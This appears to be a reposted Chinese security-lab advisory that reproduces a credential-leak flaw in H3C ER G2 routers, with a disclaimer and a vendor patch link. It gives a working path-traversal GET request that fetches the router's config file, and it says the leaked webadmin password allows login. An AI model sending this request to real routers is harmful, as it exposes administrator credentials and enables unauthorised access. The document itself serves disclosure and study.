网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
ER G2系列路由器是H3C公司推出的一款高性能路由器,它主要定位于以太网/光纤/ADSL接入的SMB市场和政府、企业机构、网吧等网络环境,如需要高速Internet带宽的网吧、企业、学校和酒店等。
ERxxxxG2 (ER2200G2)
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1Host: 127.0.0.1:8081
漏洞复现,请求该地址查看响应结果
通过泄漏的账户密码信息成功登录。(响应中查询webadmin获取密码)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.h3c.com/cn/Products___Technology/Products/Router/Catalog/ER/ER3200/
原文始发于微信公众号(弥天安全实验室):H3C ER G2系列路由器敏感信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论